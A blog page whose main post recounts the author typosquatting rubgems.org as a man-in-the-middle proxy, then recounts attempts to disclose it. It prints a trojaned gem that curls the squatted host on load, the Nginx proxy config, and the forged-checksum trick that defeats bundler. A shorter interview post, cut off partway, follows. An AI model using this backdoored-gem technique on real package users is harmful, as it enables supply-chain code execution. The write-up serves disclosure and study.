
<!DOCTYPE html>
<!--[if IEMobile 7 ]><html class="no-js iem7"><![endif]-->
<!--[if lt IE 9]><html class="no-js lte-ie8"><![endif]-->
<!--[if (gt IE 8)|(gt IEMobile 7)|!(IEMobile)|!(IE)]><!--><html class="no-js" lang="en"><!--<![endif]-->
<head>
  <meta charset="utf-8">
  <title>
    
      Gavin Miller 
    
    </title>
  <meta name="author" content="Gavin Miller">

  
  <meta name="description" content="This story starts at the console debugging a coworker&rsquo;s issue. They had gotten stuck trying to
run bundle install. Try, and fail. Try, and &hellip;">
  

  <meta name="HandheldFriendly" content="True">
  <meta name="MobileOptimized" content="320">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <!-- using https://realfavicongenerator.net -->
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">

  <link href="/stylesheets/screen-b003b807d9599aa00de10eadf8f584f1.css" media="screen, projection" rel="stylesheet" type="text/css">
  <link href="/atom.xml" rel="alternate" title="Gavin Miller" type="application/atom+xml">

  <!-- Main font from: http://google.com/webfonts -->
  <link href='http://fonts.googleapis.com/css?family=Lato:400,700,400italic,700italic' rel='stylesheet' type='text/css'>

  
  <script async>
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', 'UA-11555058-3']);
    _gaq.push(['_trackPageview']);

    (function() {
      var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
      ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
      var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
  </script>


</head>

<body   >
  <header role="banner"></header>
  <nav role="navigation">

<ul class="main-navigation">
  <li><a href="/">Home</a></li>
  <li><a href="/archives">Archives</a></li>
  <li><a href="/other-archives/">Other Posts</a></li>
</ul>
</nav>
  <div id="main">
    <div id="content">
      <div class="blog-index">
  
  
    
    <article>
      
  <header>
    
      <h1 class="entry-title"><a href="/2020/how-i-mitmd-rubygems-org-kinda/">How I MITM&#8217;d rubygems.org &#8230; Kinda</a></h1>
    
    

<span class="categories">
  
    <a class='category' href='/categories/ruby/'>ruby</a>, <a class='category' href='/categories/security/'>security</a>
  
</span>


    
      <p class="meta">
        
      </p>
    
  </header>


  <div class="entry-content"><p>This story starts at the console debugging a coworker&rsquo;s issue. They had gotten stuck trying to
run <code>bundle install</code>. Try, and fail. Try, and fail. And the error was really weird:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>Could not reach host rubgems.org. Check your network connection and try again.</span></code></pre></td></tr></table></div></figure>


<p>We went through the normal steps: <a href="https://www.youtube.com/watch?v=5UT8RkSmN4k">turn it off and on again</a>,
check wifi, load up google, go for a <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/2615.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="coffee">
              coffee
              </span>
            </span>
          , etc. Standard debugging techniques.</p>

<p>Finally we realized the <code>y</code> had inadvertently been dropped in <code>source 'https://rubgems.org'</code>.
Huh. Go figure. We moved on our way after giggling a little.  Rub gems. Hehe.</p>

<p>Then I got to thinking. If my colleague had made this mistake, surely other people have made this error
too. I checked the whois record, and it was available! <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/take_my_money.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="take_my_money">
              take_my_money
              </span>
            </span>
          </p>

<p>I was now in possession of <code>rubgems.org</code>, and was left with the question: What can I do with
it? Which lead me to the logical conclusion: I wonder if I can Man in the Middle <code>rubygems.org</code> and see
if other people make this typo!</p>

<p>It was stupid easy to setup a MITM. Grab a tiny AWS box, configure DNS, setup an Nginx proxy, and add let&rsquo;s
encrypt to the box. The Nginx config looked like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>server {
</span><span class='line'>  listen       80;
</span><span class='line'>  server_name  _;
</span><span class='line'>  return 301 https://$host$request_uri;
</span><span class='line'>}
</span><span class='line'>
</span><span class='line'>server {
</span><span class='line'>  listen 443 ssl;
</span><span class='line'>
</span><span class='line'>  server_name  rubgems.org;
</span><span class='line'>  location / {
</span><span class='line'>    proxy_pass $scheme://rubygems.org;
</span><span class='line'>    sub_filter 'rubygems.org' 'rubgems.org';
</span><span class='line'>  }
</span><span class='line'>
</span><span class='line'>  # SSL Config
</span><span class='line'>}</span></code></pre></td></tr></table></div></figure>


<p>And that was it. I cobbled together some commands to build a simple log file parser to send me a list of
unique IPs each day via email, and then I sat back and waited.</p>

<h2>What Does a RubyGems MITM Get You?</h2>

<p>While I waited, I investigated and tried to determine: What is possible if you&rsquo;ve got control of a rubygem?
To answer this question I created a <code>trojan_horse</code> gem. You can see it here on <code>rubygems.org</code>:
<a href="https://rubygems.org/gems/trojan_horse">https://rubygems.org/gems/trojan_horse</a>.</p>

<p>The rough contents of which were:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>class TrojanHorse
</span><span class='line'>  def self.hi
</span><span class='line'>    puts "I'm a real horse"
</span><span class='line'>  end
</span><span class='line'>end</span></code></pre></td></tr></table></div></figure>


<p>Then I made a modification of the gem and added my MITM code at the top:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>`curl http://rubgems.org/request_capture`
</span><span class='line'>
</span><span class='line'>class TrojanHorse
</span><span class='line'>  def self.hi
</span><span class='line'>    puts "I'm a real horse"
</span><span class='line'>  end
</span><span class='line'>end</span></code></pre></td></tr></table></div></figure>


<p>I put this gem onto my MITM&rsquo;d server, and tried to download it through various means.</p>

<h2>RubyGems</h2>

<p>Let&rsquo;s see what happens with RubyGems. I started looking at <code>gem install</code> and set the <code>--source</code> flag,
here&rsquo;s what got downloaded:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>$ gem install --source https://rubgems.org trojan_horse --verbose
</span><span class='line'>HEAD https://rubygems.org/api/v1/dependencies
</span><span class='line'>200 OK
</span><span class='line'>HEAD https://rubgems.org/api/v1/dependencies
</span><span class='line'>200 OK
</span><span class='line'>GET https://rubygems.org/api/v1/dependencies?gems=trojan_horse
</span><span class='line'>200 OK
</span><span class='line'>GET https://rubgems.org/api/v1/dependencies?gems=trojan_horse
</span><span class='line'>200 OK
</span><span class='line'>GET https://rubygems.org/quick/Marshal.4.8/trojan_horse-0.0.1.gemspec.rz
</span><span class='line'>200 OK
</span><span class='line'>/usr/local/share/gems/trojan_horse-0.0.1/lib/trojan_horse.rb
</span><span class='line'>Successfully installed trojan_horse-0.0.1
</span><span class='line'>Parsing documentation for trojan_horse-0.0.1
</span><span class='line'>Parsing sources...
</span><span class='line'>100% [ 1/ 1]  lib/trojan_horse.rb
</span><span class='line'>Installing ri documentation for trojan_horse-0.0.1
</span><span class='line'>Done installing documentation for trojan_horse after 0 seconds
</span><span class='line'>1 gem installed
</span><span class='line'>
</span><span class='line'>$ ruby -e "require 'trojan_horse'"
</span><span class='line'>$</span></code></pre></td></tr></table></div></figure>


<p>Huh interesting. It reaches out to <code>rubygems.org</code> and then <code>rubgems.org</code>, but the download prefers to use
<code>rubygems.org</code> over my MITM. Wonder why? Checking out the help docs solves that problem:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>gem install --help
</span><span class='line'># ...
</span><span class='line'>-s, --source URL                 Append URL to list of remote gem sources</span></code></pre></td></tr></table></div></figure>


<p>From this it looks like the url is appended to the end such that if the gem doesn&rsquo;t exist on <code>rubygems.org</code>
only then will it reach out to a different source. No MITM possibility there!</p>

<h2>Fresh Installation with Bundler</h2>

<p>Next I tried my hand at bundler. I started by creating the following Gemfile entry:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>source 'https://rubgems.org'
</span><span class='line'>gem 'trojan_horse'</span></code></pre></td></tr></table></div></figure>


<p>And received:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>$ bundle install --verbose
</span><span class='line'>Running `bundle install --verbose` with bundler 2.0.1
</span><span class='line'>HTTP GET https://rubgems.org/versions
</span><span class='line'>HTTP 200 OK https://rubgems.org/versions
</span><span class='line'>Fetching gem metadata from https://rubgems.org/
</span><span class='line'>Looking up gems ["trojan_horse"]
</span><span class='line'>HTTP GET https://rubgems.org/info/trojan_horse
</span><span class='line'>HTTP 200 OK https://rubgems.org/info/trojan_horse
</span><span class='line'>Resolving dependencies...
</span><span class='line'>Using bundler 2.0.1
</span><span class='line'>0:  bundler (2.0.1) from /usr/local/share/gems/specifications/bundler-2.0.1.gemspec
</span><span class='line'>Fetching trojan_horse 0.0.1
</span><span class='line'>Installing trojan_horse 0.0.1
</span><span class='line'>0:  trojan_horse (0.0.1) from /usr/local/share/gems/specifications/trojan_horse-0.0.1.gemspec
</span><span class='line'>Bundle complete! 1 Gemfile dependency, 2 gems now installed.
</span><span class='line'>Use `bundle info [gemname]` to see where a bundled gem is installed.
</span><span class='line'>
</span><span class='line'>$ ruby -e "require 'trojan_horse'"
</span><span class='line'>% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
</span><span class='line'>Dload  Upload   Total   Spent    Left  Speed
</span><span class='line'>100     3  100     3    0     0      7      0 --:--:-- --:--:-- --:--:--     7</span></code></pre></td></tr></table></div></figure>


<p>As you can see from the <code>curl</code> output, having never downloaded the gem before, I have RCE through the gem.</p>

<h2>Reinstall with Bundler</h2>

<p>With the bundler reinstall, I began by uninstalling <code>trojan_horse</code>, and updating my <code>Gemfile</code> to the following:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>source 'https://rubygems.org'
</span><span class='line'>gem 'trojan_horse'</span></code></pre></td></tr></table></div></figure>


<p>And then ran <code>bundle install</code>:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>$ bundle install --verbose
</span><span class='line'>Running `bundle install --verbose` with bundler 1.17.3
</span><span class='line'>HTTP GET https://index.rubygems.org/versions
</span><span class='line'>HTTP 200 OK https://index.rubygems.org/versions
</span><span class='line'>Fetching gem metadata from https://rubygems.org/
</span><span class='line'>Looking up gems ["trojan_horse"]
</span><span class='line'>HTTP GET https://index.rubygems.org/info/trojan_horse
</span><span class='line'>HTTP 200 OK https://index.rubygems.org/info/trojan_horse
</span><span class='line'>Resolving dependencies...
</span><span class='line'>Using bundler 1.17.3
</span><span class='line'>0:  bundler (1.17.3) from /usr/local/share/gems/specifications/bundler-1.17.3.gemspec
</span><span class='line'>Fetching trojan_horse 0.0.1
</span><span class='line'>Installing trojan_horse 0.0.1
</span><span class='line'>0:  trojan_horse (0.0.1) from /usr/local/share/gems/specifications/trojan_horse-0.0.1.gemspec
</span><span class='line'>Bundle complete! 1 Gemfile dependency, 2 gems now installed.
</span><span class='line'>
</span><span class='line'>$ ruby -e "require 'trojan_horse'"
</span><span class='line'>$</span></code></pre></td></tr></table></div></figure>


<p>As you can see the gem downloaded cleanly from <code>rubygems.org</code>, without a trojan. Next I updated the
<code>Gemfile</code> back to <code>rubgems</code> and ran <code>bundle install --verbose</code>:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
<span class='line-number'>12</span>
<span class='line-number'>13</span>
<span class='line-number'>14</span>
<span class='line-number'>15</span>
<span class='line-number'>16</span>
<span class='line-number'>17</span>
<span class='line-number'>18</span>
<span class='line-number'>19</span>
<span class='line-number'>20</span>
<span class='line-number'>21</span>
<span class='line-number'>22</span>
<span class='line-number'>23</span>
<span class='line-number'>24</span>
<span class='line-number'>25</span>
<span class='line-number'>26</span>
<span class='line-number'>27</span>
</pre></td><td class='code'><pre><code class=''><span class='line'># bundle install --verbose
</span><span class='line'>Running `bundle install --verbose` with bundler 1.17.3
</span><span class='line'>Found changes from the lockfile, re-resolving dependencies because the list of sources changed
</span><span class='line'>HTTP GET https://rubgems.org/versions
</span><span class='line'>HTTP 200 OK https://rubgems.org/versions
</span><span class='line'>Fetching gem metadata from https://rubgems.org/
</span><span class='line'>Looking up gems ["trojan_horse"]
</span><span class='line'>HTTP GET https://rubgems.org/info/trojan_horse
</span><span class='line'>HTTP 200 OK https://rubgems.org/info/trojan_horse
</span><span class='line'>HTTP GET https://rubgems.org/info/trojan_horse
</span><span class='line'>HTTP 200 OK https://rubgems.org/info/trojan_horse
</span><span class='line'>
</span><span class='line'>Retrying fetcher due to error (2/4): Bundler::HTTPError The checksum of /info/trojan_horse does
</span><span class='line'>  not match the checksum provided by the server! Something is wrong (local checksum
</span><span class='line'>  is "\"534cd8e8e81a4c9e4506940916c63080\"", was expecting "\"5cea0d4d-55\"").
</span><span class='line'>
</span><span class='line'>Looking up gems ["trojan_horse"]
</span><span class='line'>Double checking for ["trojan_horse"] in repository https://rubgems.org/ or installed locally
</span><span class='line'>Fetching gem metadata from https://rubgems.org/
</span><span class='line'>Looking up gems ["trojan_horse"]
</span><span class='line'>Resolving dependencies...
</span><span class='line'>Using bundler 1.17.3
</span><span class='line'>0:  bundler (1.17.3) from /usr/local/share/gems/specifications/bundler-1.17.3.gemspec
</span><span class='line'>Installing trojan_horse 0.0.1
</span><span class='line'>0:  trojan_horse (0.0.1) from /usr/local/share/gems/specifications/trojan_horse-0.0.1.gemspec
</span><span class='line'>Bundle complete! 1 Gemfile dependency, 2 gems now installed.
</span><span class='line'>Use `bundle info [gemname]` to see where a bundled gem is installed.</span></code></pre></td></tr></table></div></figure>


<p>And herein I got caught! Bundler does a checksum comparison on the gem verses the server. But if I control
the server, shouldn&rsquo;t I be able to control the checksum? I checked what <code>/info/trojan_horse</code> returned:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>curl https://rubgems.org/info/trojan_horse
</span><span class='line'>---
</span><span class='line'>0.0.1 |checksum:f199445ebe0d03a6125c80b5eae7678dfc88caa4a5bfc631928df2ff7354ee5c
</span><span class='line'>
</span><span class='line'>curl https://rubygems.org/info/trojan_horse
</span><span class='line'>---
</span><span class='line'>0.0.1 |checksum:94b11151b60a613ecc426ac5855621aded3a8396b5a307bf24ecc2288ebc13c8</span></code></pre></td></tr></table></div></figure>


<p>Those are different, but they don&rsquo;t match the checksum failure I was getting. Things actually got
confusing at this point. And when that happens, I jump into the source code and try to get a debugger
around what&rsquo;s happening.</p>

<p>Grepping for &ldquo;does not match the checksum&rdquo; on github lead me to <a href="https://github.com/rubygems/bundler/blob/9d733d92abe4e492f07027fc5928a5a1172d6b31/lib/bundler/compact_index_client/updater.rb#L10">MisMatchedChecksumError</a>. And finally down to <a href="https://github.com/rubygems/bundler/blob/9d733d92abe4e492f07027fc5928a5a1172d6b31/lib/bundler/compact_index_client/updater.rb#L70">line 70</a>.</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
</pre></td><td class='code'><pre><code class=''><span class='line'> if etag_for(local_temp_path) == response_etag</span></code></pre></td></tr></table></div></figure>


<p>At this point with a debugger around the code, I can start to look at the two variable values:</p>

<ul>
<li><code>local_temp_path</code> is a path to a local cache of the <code>/info/trojan_horse</code> file; on my local that path looks like this:</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>cat /tmp/bundler-compact-index-20200218-620-1ujtcvc/trojan_horse
</span><span class='line'>---
</span><span class='line'>0.0.1 |checksum:f199445ebe0d03a6125c80b5eae7678dfc88caa4a5bfc631928df2ff7354ee5c</span></code></pre></td></tr></table></div></figure>


<ul>
<li><code>response_etag</code> is the ETag value from the request sent to rubgems for <code>/info/trojan_horse</code>. That value came back as:</li>
</ul>


<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>&gt; response["ETag"]
</span><span class='line'>=&gt; "\"5cea0d4d-55\""</span></code></pre></td></tr></table></div></figure>


<p>First mystery solved I found one of the checksums. It&rsquo;s a partial MD5 hash coming from ETag <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/confused-cat.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="confused-cat">
              confused-cat
              </span>
            </span>
          </p>

<p><aside>
Turns out the partial MD5 hash coming from the ETag was my Nginx server sending the default ETag (more later).
Looking at <code>rubygems.org</code> they send a full hash like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>$ curl -vvv https://rubygems.org/info/trojan_horse 2&gt;&1 | grep ETag
</span><span class='line'>&lt; ETag: "c0f746ed9f42c349618761231c5e51ce"</span></code></pre></td></tr></table></div></figure>


<p>I didn&rsquo;t update this, because I really think the <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/confused-cat.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="confused-cat">
              confused-cat
              </span>
            </span>
           meme is hilarious and wanted to use the emoji.
</aside></p>

<p>Still digging, I followed the method <code>etag_for</code> and ended up at this code:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
<span class='line-number'>11</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>def etag_for(path)
</span><span class='line'>  sum = checksum_for_file(path)
</span><span class='line'>  sum ? %("#{sum}") : nil
</span><span class='line'>end
</span><span class='line'>
</span><span class='line'>def checksum_for_file(path)
</span><span class='line'>  return nil unless path.file?
</span><span class='line'>  # ... &lt;snip&gt;
</span><span class='line'>
</span><span class='line'>  SharedHelpers.digest(:MD5).hexdigest(IO.read(path))
</span><span class='line'>end</span></code></pre></td></tr></table></div></figure>


<p>That makes more sense! Bundler is doing an MD5 hash against the contents of the file returned at
<code>/info/trojan_horse</code>. The MD5 hash for that file looks like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>&gt; content = File.read(local_temp_path)
</span><span class='line'>=&gt; "---\n0.0.1 |checksum:f199445ebe0d03a6125c80b5eae7678dfc88caa4a5bfc631928df2ff7354ee5c\n"
</span><span class='line'>&gt; Digest::MD5.hexdigest(content)
</span><span class='line'>=&gt; "534cd8e8e81a4c9e4506940916c63080"</span></code></pre></td></tr></table></div></figure>


<p>And this is the second piece. The ETag is not matching with what I have on the local cache and
that&rsquo;s why the installation is failing. Makes sense. But I control the server, so I can modify
the ETag! All that&rsquo;s expected from the bundler standpoint is an MD5 checksum that matches the
contents of the file.</p>

<p>I switched up my Nginx configuration so that when is requested <code>/info/trojan_horse</code> it reverse proxies to
a local ruby server and sends back the MD5 hash it was expecting.</p>

<p>And viola! The backdoored gem installed. I was actually shocked at this point. I expected
additional safety checks to break, and that wasn&rsquo;t the case. The lesson here is if you own the server,
the client can&rsquo;t do anything to save itself from you.</p>

<h3>Summary</h3>

<p>To summarize my findings:</p>

<ul>
<li>There&rsquo;s no possibility of MITM against <code>gem install</code></li>
<li>And I have full MITM with RCE against <code>bundle install</code></li>
</ul>


<h2>Back to the Story&hellip;</h2>

<p>After about 3 months I tallied up my stats. I had a collection of around 100 IPs. The geographical layout
looked like this:</p>

<figure class='code'><div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers"><span class='line-number'>1</span>
<span class='line-number'>2</span>
<span class='line-number'>3</span>
<span class='line-number'>4</span>
<span class='line-number'>5</span>
<span class='line-number'>6</span>
<span class='line-number'>7</span>
<span class='line-number'>8</span>
<span class='line-number'>9</span>
<span class='line-number'>10</span>
</pre></td><td class='code'><pre><code class=''><span class='line'>Location          | Count
</span><span class='line'>------------------|------
</span><span class='line'>Amazon - Virginia | 51
</span><span class='line'>United States     | 7
</span><span class='line'>Brazil            | 6
</span><span class='line'>China             | 5
</span><span class='line'>UK                | 5
</span><span class='line'>Germany           | 5
</span><span class='line'>Canada            | 3
</span><span class='line'>Others with 1 IP  | 19</span></code></pre></td></tr></table></div></figure>


<p>Not too shabby. You&rsquo;ll noticed that half of those connections are for AWS. Which should give you pause,
because it likely means my MITM was running on a staging or production server. Yikes! At this point I felt
like my little experiment had run its course and demonstrated that this was a viable method for running a
rubygems MITM.</p>

<p>I wasn&rsquo;t entirely sure how to properly disclose this info. It was sensitive. But also, kinda not really.
Especially since I owned the domain in question. But that said, there could be other domains
that could be squatted so I felt it best to start quietly.</p>

<p>I started by submitting a report to <a href="https://hackerone.com/rubygems">HackerOne against the RubyGems</a> program.
If I could get paid for this, why not! Rejected. I wasn&rsquo;t surprised with that. I asked to publicly disclose &hellip;
it waited for a month until I bumped it, the H1 staff replied &ldquo;we&rsquo;ll let you know once we have info&rdquo; and then
closed it. I took that as: &ldquo;Here is the door, please use it.&rdquo; <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/man_shrugging.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="man_shrugging">
              man_shrugging
              </span>
            </span>
          </p>

<p>The next avenue I tried was sending an email to rubygems&#8217; security email: <code>security@rubygems.org</code>. I heard
back within 2 hours, and then nothing. I sent a few follow up emails, but didn&rsquo;t hear back.
I happened to bump into <a href="https://twitter.com/ihackedwhat">RenderMan</a> at BSides Edmonton and chatted
with him about the MITM and lack of response. He
<a href="https://twitter.com/ihackedwhat/status/1175087707044761600">fired off a tweet</a> to see if he could get me
a response. Nada.</p>

<p>Finally, I spoke to a colleague that had a connection on the rubygems team. This eventually lead to a
response back from my initial email with instructions to file an issue. Progress!</p>

<p>Additionally, since this issue affected bundler, I sent <code>security@bundler.io</code> an email. That bounced back
as undeliverable. Guess that email doesn&rsquo;t exist. And sent an email to <code>team@bundler.io</code> and never got a
response.</p>

<p><aside>
Now I&rsquo;ve seen people make a fuss about poor disclosure responses from security teams. And that&rsquo;s not what
this post is about. I sit on the receiving end of a <code>security@</code> email and it
gets tiring reading shitty report, after shitty report. These folks are busy and doing a thankless job
triaging lots of garbage reports as volunteers. I appreciate all your hard work, you make the community better!</p>

<p><strong>That said, Bundler team if you&rsquo;re reading this &hellip; please fix your security email address!</strong>
</aside></p>

<p>At this point, I submitted issues with the rubygems project and bundler project, and fired up the ol&#8217; text
editor to write this post.</p>

<p>This MITM turned out to be a lot of fun to run through. While it wasn&rsquo;t a super serious issue, had I been
a malicious actor, I could have RCE on a bunch of computers right now so&hellip; Achievement unlocked &hellip; Kinda! <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/1f3c6.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="trophy">
              trophy
              </span>
            </span>
          </p>
</div>
  
  



      
        

      
    </article>
  
    
    <article>
      
  <header>
    
      <h1 class="entry-title"><a href="/2020/interview-with-a-first-year-computer-science-student/">Interview With a First Year Computer Science Student</a></h1>
    
    

<span class="categories">
  
    <a class='category' href='/categories/other/'>other</a>
  
</span>


    
      <p class="meta">
        
      </p>
    
  </header>


  <div class="entry-content"><p>It&rsquo;s been almost 2 years since my last post. There have been good intentions of writing things but you
can clearly see how that turned out. To get back on track, I&rsquo;ve pulled out an interview that I did for a
local computer science from &hellip; timestamp says Oct 2016. My thoughts have largely stayed the same so I&rsquo;ll
post it below.</p>

<hr />

<p><strong>Q: What is your title in your company?</strong><br>
A: Software Engineer 4</p>

<p><strong>Q: What are your technical certifications?</strong><br>
A: Bachelor’s Degree in Computer Science from University of Manitoba</p>

<p><strong>Q: What technical website do you follow?</strong><br>
A: Hackers News, Stackoverflow, reddit.com/r/netsec, reddit.com/r/ruby, troy hunt, krebs on security,
schneier on security, thought works, thought works technical radar, destroy all software, and xkcd</p>

<p><strong>Q: What is the biggest IT challenge you have faced and how did you handle it?</strong><br>
A: People. People are always going to be your biggest challenge (as much as you may not believe it now.)
In your day to day you’re going to interact with 10s to 100s of people, all with varying objectives,
needs, goals, beliefs, and preferences. Learn to distinguish between the important things that are worth
standing up for, and the minor details that are just bike-shedding.</p>

<p>I think the best way to handle people situations is with empathy. If you can put yourself in someone else’s
shoes, you can understand their perspective and reach a solution with them. One of my favorite sayings is</p>

<blockquote><p>would you rather be right, or would you rather be effective.</p></blockquote>

<p>I’ve taken this to mean that sometimes I need to compromise on what I think is right, if it can achieve
the same goal that my teammates and I are working towards. By being empathetic with my teammates I can
understand their perspective which makes being effective much easier.</p>

<p><strong>Q: How do you solve problems as a team when developing a software?</strong><br>
If they’re code problems, we will discuss the pros and cons of a problem, whiteboard the various solutions,
and decide. It’s usually very easy to solve problems as a team.  Taking time away from a problem can usually
help too. I’ve found that taking a walk, or going home for the day will often solve a problem when I’m not
even thinking about it.</p>

<p>Now if they’re people problems and not code problems &ndash; which are generally more common &ndash; going for a coffee
or beer with someone is the best way to solve those problems! <span class="outer-emoji">
              <span
              style="background: url('/images/emoji/unicode/1f609.png') no-repeat top left; background-size: 100%"
              class="inner-emoji"
              title="wink">
              wink
              </span>
            </span>
           Getting to know someone personally, and
face to face breaks down barriers so quickly.</p>

<p><strong>Q: As a software developer what are the tasks you do besides developing?</strong><br>
A:</p>

<ul>
<li>Writing tests: unit, integration/functional, or feature to verify software</li>
<li>Writing quick scripts to check work / validate outputs</li>
